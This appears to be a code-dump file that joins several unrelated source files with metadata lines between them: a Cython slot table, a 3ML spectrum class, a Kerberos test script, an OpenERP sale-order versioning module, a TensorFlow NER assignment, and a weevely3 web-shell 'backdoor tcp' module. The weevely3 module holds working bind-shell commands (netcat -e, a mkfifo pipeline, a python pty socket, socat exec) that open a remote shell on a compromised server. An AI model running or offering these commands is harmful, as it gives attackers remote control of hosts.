MethodSlot(segcountproc, "bf_getsegcount", "__getsegcount__", py3 = False),
MethodSlot(charbufferproc, "bf_getcharbuffer", "__getcharbuffer__", py3 = False),
MethodSlot(getbufferproc, "bf_getbuffer", "__getbuffer__", ifdef = "PY_VERSION_HEX >= 0x02060000"),
MethodSlot(releasebufferproc, "bf_releasebuffer", "__releasebuffer__", ifdef = "PY_VERSION_HEX >= 0x02060000")
)
#------------------------------------------------------------------------------------------
#
# The main slot table. This table contains descriptors for all the
# top-level type slots, beginning with tp_dealloc, in the order they
# appear in the type object.
#
#------------------------------------------------------------------------------------------
slot_table = (
ConstructorSlot("tp_dealloc", '__dealloc__'),
EmptySlot("tp_print"), #MethodSlot(printfunc, "tp_print", "__print__"),
EmptySlot("tp_getattr"),
EmptySlot("tp_setattr"),
MethodSlot(cmpfunc, "tp_compare", "__cmp__", py3 = '<RESERVED>'),
MethodSlot(reprfunc, "tp_repr", "__repr__"),
SuiteSlot(PyNumberMethods, "PyNumberMethods", "tp_as_number"),
SuiteSlot(PySequenceMethods, "PySequenceMethods", "tp_as_sequence"),
SuiteSlot(PyMappingMethods, "PyMappingMethods", "tp_as_mapping"),
MethodSlot(hashfunc, "tp_hash", "__hash__"),
MethodSlot(callfunc, "tp_call", "__call__"),
MethodSlot(reprfunc, "tp_str", "__str__"),
SyntheticSlot("tp_getattro", ["__getattr__","__getattribute__"], "0"), #"PyObject_GenericGetAttr"),
SyntheticSlot("tp_setattro", ["__setattr__", "__delattr__"], "0"), #"PyObject_GenericSetAttr"),
SuiteSlot(PyBufferProcs, "PyBufferProcs", "tp_as_buffer"),
TypeFlagsSlot("tp_flags"),
DocStringSlot("tp_doc"),
GCDependentSlot("tp_traverse"),
GCDependentSlot("tp_clear"),
# Later -- synthesize a method to split into separate ops?
MethodSlot(richcmpfunc, "tp_richcompare", "__richcmp__"),
EmptySlot("tp_weaklistoffset"),
MethodSlot(getiterfunc, "tp_iter", "__iter__"),
MethodSlot(iternextfunc, "tp_iternext", "__next__"),
MethodTableSlot("tp_methods"),
MemberTableSlot("tp_members"),
GetSetSlot("tp_getset"),
BaseClassSlot("tp_base"), #EmptySlot("tp_base"),
EmptySlot("tp_dict"),
SyntheticSlot("tp_descr_get", ["__get__"], "0"),
SyntheticSlot("tp_descr_set", ["__set__", "__delete__"], "0"),
EmptySlot("tp_dictoffset"),
MethodSlot(initproc, "tp_init", "__init__"),
EmptySlot("tp_alloc"), #FixedSlot("tp_alloc", "PyType_GenericAlloc"),
InternalMethodSlot("tp_new"),
EmptySlot("tp_free"),
EmptySlot("tp_is_gc"),
EmptySlot("tp_bases"),
EmptySlot("tp_mro"),
EmptySlot("tp_cache"),
EmptySlot("tp_subclasses"),
EmptySlot("tp_weaklist"),
EmptySlot("tp_del"),
EmptySlot("tp_version_tag", ifdef="PY_VERSION_HEX >= 0x02060000"),
)
#------------------------------------------------------------------------------------------
#
# Descriptors for special methods which don't appear directly
# in the type object or its substructures. These methods are
# called from slot functions synthesized by Cython.
#
#------------------------------------------------------------------------------------------
MethodSlot(initproc, "", "__cinit__")
MethodSlot(destructor, "", "__dealloc__")
MethodSlot(objobjargproc, "", "__setitem__")
MethodSlot(objargproc, "", "__delitem__")
MethodSlot(ssizessizeobjargproc, "", "__setslice__")
MethodSlot(ssizessizeargproc, "", "__delslice__")
MethodSlot(getattrofunc, "", "__getattr__")
MethodSlot(setattrofunc, "", "__setattr__")
MethodSlot(delattrofunc, "", "__delattr__")
MethodSlot(descrgetfunc, "", "__get__")
MethodSlot(descrsetfunc, "", "__set__")
MethodSlot(descrdelfunc, "", "__delete__")
# Method flags for python-exposed methods.
method_noargs = "METH_NOARGS"
method_onearg = "METH_O"
method_varargs = "METH_VARARGS"
method_keywords = "METH_KEYWORDS"
method_coexist = "METH_COEXIST"
|
apache-2.0
| 73,553,137,307,292,590
| 39.293734
| 133
| 0.573692
| false
| 3.754866
| false
| false
| false
|
volodymyrss/3ML
|
threeML/plugins/spectrum/binned_spectrum.py
|
1
|
20977
|
import numpy as np
import pandas as pd
from threeML.utils.histogram import Histogram
from threeML.utils.interval import Interval, IntervalSet
from threeML.plugins.OGIP.response import InstrumentResponse
from threeML.utils.stats_tools import sqrt_sum_of_squares
class Channel(Interval):
@property
def channel_width(self):
return self._get_width()
class ChannelSet(IntervalSet):
INTERVAL_TYPE = Channel
@classmethod
def from_instrument_response(cls, instrument_response):
"""
Build EBOUNDS interval from an instrument response
:param instrument_response:
:return:
"""
new_ebounds = cls.from_list_of_edges(instrument_response.ebounds)
return new_ebounds
@property
def channels_widths(self):
return np.array([channel.channel_width for channel in self._intervals ])
class Quality(object):
def __init__(self, quality):
"""
simple class to formalize the quality flags used in spectra
:param quality: a quality array
"""
#total_length = len(quality)
n_elements = 1
for dim in quality.shape:
n_elements *= dim
good = quality == 'good'
warn = quality == 'warn'
bad = quality == 'bad'
assert n_elements == good.sum() + warn.sum() + bad.sum(), 'quality can only contain "good", "warn", and "bad"'
self._good = good
self._warn = warn
self._bad = bad
self._quality = quality
def __len__(self):
return len(self._quality)
def get_slice(self, idx):
return Quality(self._quality[idx,:])
@property
def good(self):
return self._good
@property
def warn(self):
return self._warn
@property
def bad(self):
return self._bad
@property
def n_elements(self):
return len(self._quality)
@classmethod
def from_ogip(cls, ogip_quality):
good = ogip_quality == 0
warn = ogip_quality == 2
bad = np.logical_and(~good, ~warn)
quality = np.empty_like(ogip_quality,dtype='|S4')
quality[:] = 'good'
# quality = np.array(['good' for i in xrange(len(ogip_quality))])
#quality[good] = 'good'
quality[warn] = 'warn'
quality[bad] = 'bad'
return cls(quality)
def to_ogip(self):
"""
makes a quality array following the OGIP standards:
0 = good
2 = warn
5 = bad
:return:
"""
ogip_quality = np.zeros(self._quality.shape,dtype=np.int32)
ogip_quality[self.warn] = 2
ogip_quality[self.bad] = 5
return ogip_quality
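        # Illustrative example (not from the original source):
        #   Quality(np.array(['good', 'warn', 'bad'])).to_ogip()
        #   # -> array([0, 2, 5], dtype=int32)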
@classmethod
def create_all_good(cls, n_channels):
"""
construct a quality object with all good channels
:param n_channels:
:return:
"""
quality = np.array(['good' for i in xrange(int(n_channels))])
return cls(quality)
class BinnedSpectrum(Histogram):
INTERVAL_TYPE = Channel
def __init__(self, counts, exposure, ebounds, count_errors=None, sys_errors=None, quality=None, scale_factor=1.,
is_poisson=False, mission=None, instrument=None, tstart=None, tstop=None):
"""
A general binned histogram of either Poisson or non-Poisson rates. While the input is in counts, 3ML spectra work
in rates, so this class uses the exposure to construct the rates from the counts.
:param counts: an array of counts
:param exposure: the exposure for the counts
:param ebounds: the len(counts) + 1 energy edges of the histogram or an instance of EBOUNDSIntervalSet
:param count_errors: (optional) the count errors for the spectra
:param sys_errors: (optional) systematic errors on the spectrum
:param quality: quality instance marking good, bad and warned channels. If not provided, all channels are assumed to be good
:param scale_factor: scaling parameter of the spectrum
:param is_poisson: if the histogram is Poisson
:param mission: the mission name
:param instrument: the instrument name
"""
        # attach the parameters to the object
self._is_poisson = is_poisson
self._exposure = exposure
self._scale_factor = scale_factor
# if we do not have a ChannelSet,
if not isinstance(ebounds, ChannelSet):
# make one from the edges
ebounds = ChannelSet.from_list_of_edges(ebounds) #type: ChannelSet
if count_errors is not None:
assert not self._is_poisson, "Read count errors but spectrum marked Poisson"
# convert counts to rate
rate_errors = count_errors / self._exposure
else:
rate_errors = None
if sys_errors is None:
sys_errors = np.zeros_like(counts)
self._sys_errors = sys_errors
        # convert counts to rates
rates = counts / self._exposure
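        # Illustrative example (not from the original source): counts of
        # [10., 20.] with exposure = 2.0 s are stored internally as rates
        # of [5., 10.] counts/s.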
if quality is not None:
# check that we are using the 3ML quality type
assert isinstance(quality, Quality)
self._quality = quality
else:
# if there is no quality, then assume all channels are good
self._quality = Quality.create_all_good(len(rates))
if mission is None:
self._mission = 'UNKNOWN'
else:
self._mission = mission
if instrument is None:
self._instrument = 'UNKNOWN'
else:
self._instrument = instrument
self._tstart = tstart
self._tstop = tstop
# pass up to the binned spectrum
super(BinnedSpectrum, self).__init__(list_of_intervals=ebounds,
contents=rates,
errors=rate_errors,
sys_errors=sys_errors,
is_poisson=is_poisson)
@property
def n_channel(self):
return len(self)
@property
def rates(self):
"""
:return: rates per channel
"""
return self._contents
@property
def total_rate(self):
"""
:return: total rate
"""
return self._contents.sum()
@property
def total_rate_error(self):
"""
:return: total rate error
"""
assert self.is_poisson == False, "Cannot request errors on rates for a Poisson spectrum"
return sqrt_sum_of_squares(self._errors)
@property
def counts(self):
"""
:return: counts per channel
"""
return self._contents * self.exposure
@property
def count_errors(self):
"""
:return: count error per channel
"""
#VS: impact of this change is unclear to me, it seems to make sense and the tests pass
if self.is_poisson:
return None
else:
return self._errors * self.exposure
@property
def total_count(self):
"""
:return: total counts
"""
return self.counts.sum()
@property
def total_count_error(self):
"""
:return: total count error
"""
#VS: impact of this change is unclear to me, it seems to make sense and the tests pass
if self.is_poisson:
return None
else:
return sqrt_sum_of_squares(self.count_errors)
@property
def tstart(self):
return self._tstart
@property
def tstop(self):
return self._tstop
@property
def is_poisson(self):
return self._is_poisson
@property
def rate_errors(self):
"""
        If the spectrum has no Poisson error (POISSERR is False in the header), this will return the STAT_ERR column
:return: errors on the rates
"""
if self.is_poisson:
return None
else:
return self._errors
@property
def n_channels(self):
return len(self)
@property
def sys_errors(self):
"""
Systematic errors per channel. This is nonzero only if the SYS_ERR column is present in the input file.
:return: the systematic errors stored in the input spectrum
"""
return self._sys_errors
@property
def exposure(self):
"""
Exposure in seconds
:return: exposure
"""
return self._exposure
@property
def quality(self):
return self._quality
@property
def scale_factor(self):
return self._scale_factor
@property
def mission(self):
return self._mission
@property
def instrument(self):
return self._instrument
def clone(self, new_counts=None, new_count_errors=None, new_exposure=None):
"""
make a new spectrum with new counts and errors and all other
parameters the same
:param new_counts: new counts for the spectrum
:param new_count_errors: new errors from the spectrum
:return:
"""
if new_counts is None:
new_counts = self.counts
new_count_errors = self.count_errors
if new_exposure is None:
new_exposure = self.exposure
return BinnedSpectrum(counts=new_counts,
ebounds=ChannelSet.from_list_of_edges(self.edges),
exposure=new_exposure,
count_errors=new_count_errors,
sys_errors=self._sys_errors,
quality=self._quality,
scale_factor=self._scale_factor,
is_poisson=self._is_poisson,
mission=self._mission,
instrument=self._instrument)
@classmethod
def from_pandas(cls,pandas_dataframe,exposure,scale_factor=1.,is_poisson=False,mission=None,instrument=None):
"""
Build a spectrum from data contained within a pandas data frame.
The required columns are:
'emin': low energy bin edge
'emax': high energy bin edge
'counts': the counts in each bin
Optional column names are:
'count_errors': errors on the counts for non-Poisson data
'sys_errors': systematic error per channel
        'quality': list of 3ML quality flags 'good', 'warn', 'bad'
:param pandas_dataframe: data frame containing information to be read into spectrum
:param exposure: the exposure of the spectrum
:param scale_factor: the scale factor of the spectrum
:param is_poisson: if the data are Poisson distributed
:param mission: (optional) the mission name
:param instrument: (optional) the instrument name
:return:
"""
# get the required columns
emin = np.array(pandas_dataframe['emin'])
emax = np.array(pandas_dataframe['emax'])
counts = np.array(pandas_dataframe['counts'])
ebounds = emin.tolist()
ebounds.append(emax[-1])
ebounds = ChannelSet.from_list_of_edges(ebounds)
# default optional parameters
count_errors = None
sys_errors = None
quality = None
if 'count_errors' in pandas_dataframe.keys():
count_errors = np.array(pandas_dataframe['count_errors'])
if 'sys_errors' in pandas_dataframe.keys():
sys_errors = np.array(pandas_dataframe['sys_errors'])
if 'quality' in pandas_dataframe.keys():
quality = Quality(np.array(pandas_dataframe['quality']))
return cls(counts=counts,
exposure=exposure,
ebounds=ebounds,
count_errors=count_errors,
sys_errors=sys_errors,
quality=quality,
scale_factor=scale_factor,
is_poisson=is_poisson,
mission=mission,
instrument=instrument)
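    # Illustrative usage sketch (not from the original source; the column
    # names follow the docstring above):
    #
    #   df = pd.DataFrame({'emin': [10., 20.], 'emax': [20., 30.],
    #                      'counts': [100, 80]})
    #   spectrum = BinnedSpectrum.from_pandas(df, exposure=10., is_poisson=True)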
def to_pandas(self,use_rate=True):
"""
make a pandas table from the spectrum.
:param use_rate: if the table should use rates or counts
:return:
"""
if use_rate:
out_name = 'rates'
out_values = self.rates
else:
out_name = 'counts'
out_values = self.rates * self.exposure
        out_dict = {'emin': self.starts, 'emax': self.stops, out_name: out_values, 'quality': self.quality}
if self.rate_errors is not None:
if use_rate:
out_dict['rate_errors'] = self.rate_errors
else:
                out_dict['count_errors'] = self.rate_errors * self.exposure
if self.sys_errors is not None:
            out_dict['sys_errors'] = self.sys_errors
return pd.DataFrame(out_dict)
@classmethod
def from_time_series(cls, time_series, use_poly=False):
"""
:param time_series:
:param use_poly:
:return:
"""
raise NotImplementedError('This is still under construction')
pha_information = time_series.get_information_dict(use_poly)
is_poisson = True
if use_poly:
is_poisson = False
return cls(instrument=pha_information['instrument'],
mission=pha_information['telescope'],
tstart=pha_information['tstart'],
telapse=pha_information['telapse'],
#channel=pha_information['channel'],
counts=pha_information['counts'],
count_errors=pha_information['counts error'],
quality=pha_information['quality'],
grouping=pha_information['grouping'],
exposure=pha_information['exposure'],
backscale=1.,
is_poisson=is_poisson)
def __add__(self,other):
assert self == other, "The bins are not equal"
new_sys_errors=self.sys_errors
if new_sys_errors is None:
new_sys_errors=other.sys_errors
elif other.sys_errors is not None:
new_sys_errors += other.sys_errors
new_exposure = self.exposure + other.exposure
if self.count_errors is None and other.count_errors is None:
new_count_errors = None
else:
            assert self.count_errors is not None and other.count_errors is not None, 'only one of the two spectra has errors, can not add!'
new_count_errors = (self.count_errors**2 + other.count_errors**2) ** 0.5
new_counts = self.counts + other.counts
new_spectrum = self.clone(new_counts=new_counts,
new_count_errors=new_count_errors,
new_exposure=new_exposure)
new_spectrum._tstart = min(self.tstart,other.tstart)
new_spectrum._tstop = max(self.tstop,other.tstop)
return new_spectrum
def add_inverse_variance_weighted(self, other):
assert self == other, "The bins are not equal"
if self.is_poisson or other.is_poisson:
raise Exception("Inverse_variance_weighting not implemented for poisson")
new_sys_errors=self.sys_errors
if new_sys_errors is None:
new_sys_errors=other.sys_errors
elif other.sys_errors is not None:
new_sys_errors += other.sys_errors
new_exposure = self.exposure + other.exposure
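        # Inverse-variance weighting, summarised (illustrative, not from
        # the original source): with weights w_i = 1 / e_i**2 the combined
        # error is (w_1 + w_2)**-0.5 and the combined rate is
        # (c_1*w_1 + c_2*w_2) / (w_1 + w_2), which is what the two
        # expressions below compute element-wise.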
new_rate_errors = np.array([ (e1**-2 + e2**-2)**-0.5 for e1,e2 in zip(self.rate_errors,other._errors) ] )
new_rates = np.array( [ (c1*e1**-2 + c2*e2**-2) for c1,e1,c2,e2 in zip(self.rates,self._errors,other.rates, other._errors) ] ) * new_rate_errors**2
new_count_errors = new_rate_errors * new_exposure
new_counts = new_rates * new_exposure
new_counts[np.isnan(new_counts)]=0
new_count_errors[np.isnan(new_count_errors)]=0
new_spectrum = self.clone(new_counts=new_counts,
new_count_errors=new_count_errors)
new_spectrum._exposure = new_exposure
new_spectrum._tstart = min(self.tstart,other.tstart)
new_spectrum._tstop = max(self.tstop,other.tstop)
return new_spectrum
class BinnedSpectrumWithDispersion(BinnedSpectrum):
def __init__(self, counts, exposure, response, count_errors=None, sys_errors=None, quality=None, scale_factor=1.,
is_poisson=False, mission=None, instrument=None, tstart=None, tstop=None ):
"""
A binned spectrum that must be deconvolved via a dispersion or response matrix
:param counts:
:param exposure:
:param response:
:param count_errors:
:param sys_errors:
:param quality:
:param scale_factor:
:param is_poisson:
:param mission:
:param instrument:
"""
assert isinstance(response, InstrumentResponse), 'The response is not a valid instance of InstrumentResponse'
self._rsp = response
ebounds = ChannelSet.from_instrument_response(response)
super(BinnedSpectrumWithDispersion, self).__init__(counts=counts,
exposure=exposure,
ebounds=ebounds,
count_errors=count_errors,
sys_errors=sys_errors,
quality=quality,
scale_factor=scale_factor,
is_poisson=is_poisson,
mission=mission,
instrument=instrument,
tstart=tstart,
tstop=tstop)
@property
def response(self):
return self._rsp
@classmethod
def from_time_series(cls, time_series, response, use_poly=False):
"""
:param time_series:
:param use_poly:
:return:
"""
pha_information = time_series.get_information_dict(use_poly)
is_poisson = True
if use_poly:
is_poisson = False
return cls(instrument=pha_information['instrument'],
mission=pha_information['telescope'],
tstart=pha_information['tstart'],
tstop=pha_information['tstart'] + pha_information['telapse'],
#channel=pha_information['channel'],
                   counts=pha_information['counts'],
count_errors=pha_information['counts error'],
quality=pha_information['quality'],
#grouping=pha_information['grouping'],
exposure=pha_information['exposure'],
response=response,
scale_factor=1.,
is_poisson=is_poisson)
def clone(self, new_counts=None, new_count_errors=None, new_sys_errors=None, new_exposure=None):
"""
make a new spectrum with new counts and errors and all other
parameters the same
:param new_counts: new counts for the spectrum
:param new_count_errors: new errors from the spectrum
:return:
"""
if new_counts is None:
new_counts = self.counts
new_count_errors = self.count_errors
if new_sys_errors is None:
new_sys_errors = self.sys_errors
if new_exposure is None:
new_exposure = self.exposure
return BinnedSpectrumWithDispersion(counts=new_counts,
exposure=new_exposure,
response=self._rsp,
count_errors=new_count_errors,
sys_errors=new_sys_errors,
quality=self._quality,
scale_factor=self._scale_factor,
is_poisson=self._is_poisson,
mission=self._mission,
instrument=self._instrument)
def __add__(self,other):
#TODO implement equality in InstrumentResponse class
assert self.response is other.response
new_spectrum = super(BinnedSpectrumWithDispersion,self).__add__(other)
return new_spectrum
|
bsd-3-clause
| 6,971,004,834,332,659,000
| 27.194892
| 155
| 0.550794
| false
| 4.486099
| false
| false
| false
|
drankye/kerb-token
|
krb5/src/tests/t_general.py
|
1
|
2018
|
#!/usr/bin/python
from k5test import *
for realm in multipass_realms(create_host=False):
# Check that kinit fails appropriately with the wrong password.
output = realm.run([kinit, realm.user_princ], input='wrong\n',
expected_code=1)
if 'Password incorrect while getting initial credentials' not in output:
fail('Expected error message not seen in kinit output')
# Check that we can kinit as a different principal.
realm.kinit(realm.admin_princ, password('admin'))
realm.klist(realm.admin_princ)
# Test FAST kinit.
fastpw = password('fast')
realm.run_kadminl('ank -pw %s +requires_preauth user/fast' % fastpw)
realm.kinit('user/fast', fastpw)
realm.kinit('user/fast', fastpw, flags=['-T', realm.ccache])
realm.klist('user/fast@%s' % realm.realm)
# Test kinit against kdb keytab
realm.run([kinit, "-k", "-t", "KDB:", realm.user_princ])
# Test that we can get initial creds with an empty password via the
# API. We have to disable the "empty" pwqual module to create a
# principal with an empty password. (Regression test for #7642.)
conf={'plugins': {'pwqual': {'disable': 'empty'}}}
realm = K5Realm(create_user=False, create_host=False, krb5_conf=conf)
realm.run_kadminl('addprinc -pw "" user')
realm.run(['./t_init_creds', 'user', ''])
realm.stop()
realm = K5Realm(create_host=False)
# Spot-check KRB5_TRACE output
tracefile = os.path.join(realm.testdir, 'trace')
realm.run(['env', 'KRB5_TRACE=' + tracefile, kinit, realm.user_princ],
input=(password('user') + "\n"))
f = open(tracefile, 'r')
trace = f.read()
f.close()
expected = ('Sending initial UDP request',
'Received answer',
'Selected etype info',
'AS key obtained',
'Decrypted AS reply',
'FAST negotiation: available',
'Storing user@KRBTEST.COM')
for e in expected:
if e not in trace:
fail('Expected output not in kinit trace log')
success('FAST kinit, trace logging')
|
apache-2.0
| -8,659,719,704,759,129,000
| 36.37037
| 76
| 0.654113
| false
| 3.335537
| true
| false
| false
|
dhp-denero/LibrERP
|
sale_order_version/sale.py
|
1
|
6008
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2004-2012 Pexego Sistemas Informáticos. All Rights Reserved
# $Alejandro Núñez Liz$
# $Omar Castiñeira Saavedra$
#
# Copyright (C) 2014 Didotech srl (<http://www.didotech.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
from tools import ustr
class sale_order_line(orm.Model):
_inherit = "sale.order.line"
_columns = {
#'active': fields.related('order_id', 'active', type='boolean', string='Active', store=False),
'sale_line_copy_id': fields.many2one('sale.order.line', 'Orig version', required=False, readonly=False),
}
def copy_data(self, cr, uid, line_id, defaults=None, context=None):
defaults = defaults or {}
defaults['sale_line_copy_id'] = line_id
return super(sale_order_line, self).copy_data(cr, uid, line_id, defaults, context)
def copy(self, cr, uid, line_id, defaults, context=None):
defaults = defaults or {}
defaults['sale_line_copy_id'] = line_id
return super(sale_order_line, self).copy(cr, uid, line_id, defaults, context)
class sale_order(orm.Model):
""" Modificaciones de sale order para añadir la posibilidad de versionar el pedido de venta. """
_inherit = "sale.order"
def action_previous_version(self, cr, uid, ids, default=None, context=None):
if not default:
default = {}
if not context:
context = {}
attachment_obj = self.pool['ir.attachment']
orders = self.browse(cr, uid, ids, context=context)
order_ids = []
for order in orders:
vals = {
'version': (order.version and order.version or 1) + 1,
}
if not order.sale_version_id:
vals['sale_version_id'] = order.id
context['versioning'] = True
vals['name'] = (order.sale_version_id and order.sale_version_id.name or order.name) + u" V." + ustr(vals['version'])
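            # Illustrative example (not from the original source): an order
            # named 'SO005' still at the default version of 0 is archived and
            # copied as 'SO005 V.2' (version 0 is falsy, so the base version
            # falls back to 1 before the increment above).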
new_order_id = self.copy(cr, uid, order.id, vals, context=context)
attachment_ids = attachment_obj.search(cr, uid, [('res_model', '=', 'sale.order'), ('res_id', '=', order.id)])
if attachment_ids:
attachment_obj.write(cr, uid, attachment_ids, {'res_id': new_order_id, 'res_name': vals['name']})
order.write({'active': False})
order_ids.append(new_order_id)
mod_obj = self.pool['ir.model.data']
res = mod_obj.get_object_reference(cr, uid, 'sale', 'view_order_form')
        res_id = res and res[1] or False
return {
'name': 'Sale Order',
'view_type': 'form',
'view_mode': 'form',
'view_id': res_id,
'res_model': 'sale.order',
'type': 'ir.actions.act_window',
'nodestroy': True,
'target': 'current',
'res_id': order_ids and order_ids[0] or False,
}
def _get_version_ids(self, cr, uid, ids, field_name, arg, context=None):
if context is None:
context = {}
res = {}
for sale in self.browse(cr, uid, ids):
if sale.sale_version_id:
res[sale.id] = self.search(cr, uid, ['|', ('sale_version_id', '=', sale.sale_version_id.id), ('id', '=', sale.sale_version_id.id), ('version', '<', sale.version), '|', ('active', '=', False), ('active', '=', True)])
else:
res[sale.id] = []
return res
_columns = {
'sale_version_id': fields.many2one('sale.order', 'Orig version', required=False, readonly=False),
'version': fields.integer('Version no.', readonly=True),
'active': fields.boolean('Active', readonly=False, help="It indicates that the sales order is active."),
'version_ids': fields.function(_get_version_ids, method=True, type="one2many", relation='sale.order', string='Versions', readonly=True)
}
_defaults = {
'active': True,
'version': 0,
'name': '/',
}
def create(self, cr, uid, vals, context=None):
if vals.get('name', '/') == '/':
shop = self.pool['sale.shop'].browse(cr, uid, vals['shop_id'], context=context)
if shop and shop.sequence_id:
sequence = self.pool['ir.sequence'].next_by_id(cr, uid, shop.sequence_id.id)
vals.update({'name': sequence})
else:
sequence = self.pool['ir.sequence'].get(cr, uid, 'sale.order')
vals.update({'name': sequence})
if (not context or not context.get('versioning', False)) and vals.get('sale_version_id', False):
del vals['sale_version_id']
vals['version'] = 0
return super(sale_order, self).create(cr, uid, vals, context)
class sale_shop(orm.Model):
_inherit = 'sale.shop'
_columns = {
        'sequence_id': fields.many2one('ir.sequence', 'Entry Sequence', help="This field contains the information related to the numbering of the Sale Orders.", domain="[('code', '=', 'sale.order')]"),
}
|
agpl-3.0
| 3,669,966,839,879,994,000
| 41.274648
| 231
| 0.558387
| false
| 3.758923
| false
| false
| false
|
epinna/weevely3
|
modules/backdoor/tcp.py
|
1
|
3727
|
from core.vectors import PhpCode, ShellCmd, ModuleExec, Os
from core.module import Module
from core.loggers import log
from core import messages
import urllib.parse
import telnetlib
import time
class Tcp(Module):
"""Spawn a shell on a TCP port."""
def init(self):
self.register_info(
{
'author': [
'Emilio Pinna'
],
'license': 'GPLv3'
}
)
self.register_vectors(
[
ShellCmd(
"nc -l -p ${port} -e ${shell}",
name = 'netcat',
target = Os.NIX,
background = True
),
ShellCmd(
"rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|${shell} -i 2>&1|nc -l ${port} >/tmp/f; rm -rf /tmp/f",
name = 'netcat_bsd',
target = Os.NIX,
background = True
),
ShellCmd(
"""python -c 'import pty,os,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("", ${port}));s.listen(1);(rem, addr) = s.accept();os.dup2(rem.fileno(),0);os.dup2(rem.fileno(),1);os.dup2(rem.fileno(),2);pty.spawn("${shell}");s.close()';""",
name = 'python_pty',
target = Os.NIX,
background = True
),
ShellCmd(
"""socat tcp-l:${port} exec:${shell}""",
name = 'socat',
target = Os.NIX,
background = True
)
]
)
self.register_arguments([
{ 'name' : 'port', 'help' : 'Port to spawn', 'type' : int },
{ 'name' : '-shell', 'help' : 'Specify shell', 'default' : '/bin/sh' },
{ 'name' : '-no-autoconnect', 'help' : 'Skip autoconnect', 'action' : 'store_true', 'default' : False },
{ 'name' : '-vector', 'choices' : self.vectors.get_names() }
])
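        # Illustrative usage from the weevely console (assumed syntax, not
        # part of the original source):
        #   :backdoor_tcp 4444 -shell /bin/bash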
def run(self):
# Run all the vectors
for vector in self.vectors:
# Skip vector if -vector is specified but does not match
if self.args.get('vector') and self.args.get('vector') != vector.name:
continue
# Background run does not return results
vector.run(self.args)
# If set, skip autoconnect
if self.args.get('no_autoconnect'): continue
# Give some time to spawn the shell
time.sleep(1)
urlparsed = urllib.parse.urlparse(self.session['url'])
if not urlparsed.hostname:
log.debug(
messages.module_backdoor_tcp.error_parsing_connect_s % self.args['port']
)
continue
try:
telnetlib.Telnet(urlparsed.hostname, self.args['port'], timeout = 5).interact()
                # If telnetlib does not raise an exception, we can assume that
# ended correctly and return from `run()`
return
except Exception as e:
log.debug(
messages.module_backdoor_tcp.error_connecting_to_s_s_s % (
urlparsed.hostname,
self.args['port'],
e
)
)
        # If autoconnect was expected but every Telnet() attempt failed,
        # print an error message
if not self.args.get('no_autoconnect'):
log.warn(
messages.module_backdoor_tcp.error_connecting_to_s_s_s % (
urlparsed.hostname,
self.args['port'],
'remote port not open or unreachable'
)
)
|
gpl-3.0
| -6,986,358,487,308,145,000
| 32.881818
| 270
| 0.473303
| false
| 4.10011
| false
| false
| false
|
ds-hwang/deeplearning_udacity
|
cs224d_nlp/assignment2_dev/q2_NER.py
|
1
|
15598
|
import os
import getpass
import sys
import time
import numpy as np
import tensorflow as tf
from q2_initialization import xavier_weight_init
import data_utils.utils as du
import data_utils.ner as ner
from utils import data_iterator
from model import LanguageModel
class Config(object):
"""Holds model hyperparams and data information.
  The config class is used to store various hyperparameters and dataset
  information. Model objects are passed a Config() object at
instantiation.
"""
embed_size = 50
batch_size = 64
label_size = 5
hidden_size = 100
max_epochs = 24
early_stopping = 2
dropout = 0.9
lr = 0.001
l2 = 0.001
window_size = 3
class NERModel(LanguageModel):
"""Implements a NER (Named Entity Recognition) model.
This class implements a deep network for named entity recognition. It
inherits from LanguageModel, which has an add_embedding method in addition to
the standard Model method.
"""
def load_data(self, debug=False):
"""Loads starter word-vectors and train/dev/test data."""
# Load the starter word vectors
self.wv, word_to_num, num_to_word = ner.load_wv(
'data/ner/vocab.txt', 'data/ner/wordVectors.txt')
tagnames = ['O', 'LOC', 'MISC', 'ORG', 'PER']
self.num_to_tag = dict(enumerate(tagnames))
tag_to_num = {v:k for k,v in self.num_to_tag.iteritems()}
# Load the training set
docs = du.load_dataset('data/ner/train')
self.X_train, self.y_train = du.docs_to_windows(
docs, word_to_num, tag_to_num, wsize=self.config.window_size)
if debug:
self.X_train = self.X_train[:1024]
self.y_train = self.y_train[:1024]
# Load the dev set (for tuning hyperparameters)
docs = du.load_dataset('data/ner/dev')
self.X_dev, self.y_dev = du.docs_to_windows(
docs, word_to_num, tag_to_num, wsize=self.config.window_size)
if debug:
self.X_dev = self.X_dev[:1024]
self.y_dev = self.y_dev[:1024]
# Load the test set (dummy labels only)
docs = du.load_dataset('data/ner/test.masked')
self.X_test, self.y_test = du.docs_to_windows(
docs, word_to_num, tag_to_num, wsize=self.config.window_size)
def add_placeholders(self):
"""Generate placeholder variables to represent the input tensors
These placeholders are used as inputs by the rest of the model building
code and will be fed data during training. Note that when "None" is in a
    placeholder's shape, it's flexible along that dimension.
Adds following nodes to the computational graph
input_placeholder: Input placeholder tensor of shape
(None, window_size), type tf.int32
labels_placeholder: Labels placeholder tensor of shape
(None, label_size), type tf.float32
dropout_placeholder: Dropout value placeholder (scalar),
type tf.float32
Add these placeholders to self as the instance variables
self.input_placeholder
self.labels_placeholder
self.dropout_placeholder
(Don't change the variable names)
"""
### YOUR CODE HERE
self.input_placeholder = tf.placeholder(
tf.int32, shape=[None, self.config.window_size], name='Input')
self.labels_placeholder = tf.placeholder(
tf.float32, shape=[None, self.config.label_size], name='Target')
self.dropout_placeholder = tf.placeholder(tf.float32, name='Dropout')
### END YOUR CODE
def create_feed_dict(self, input_batch, dropout, label_batch=None):
"""Creates the feed_dict for softmax classifier.
A feed_dict takes the form of:
feed_dict = {
<placeholder>: <tensor of values to be passed for placeholder>,
....
}
Hint: The keys for the feed_dict should be a subset of the placeholder
tensors created in add_placeholders.
Hint: When label_batch is None, don't add a labels entry to the feed_dict.
Args:
input_batch: A batch of input data.
label_batch: A batch of label data.
Returns:
feed_dict: The feed dictionary mapping from placeholders to values.
"""
### YOUR CODE HERE
feed_dict = {
self.input_placeholder: input_batch,
}
if label_batch is not None:
feed_dict[self.labels_placeholder] = label_batch
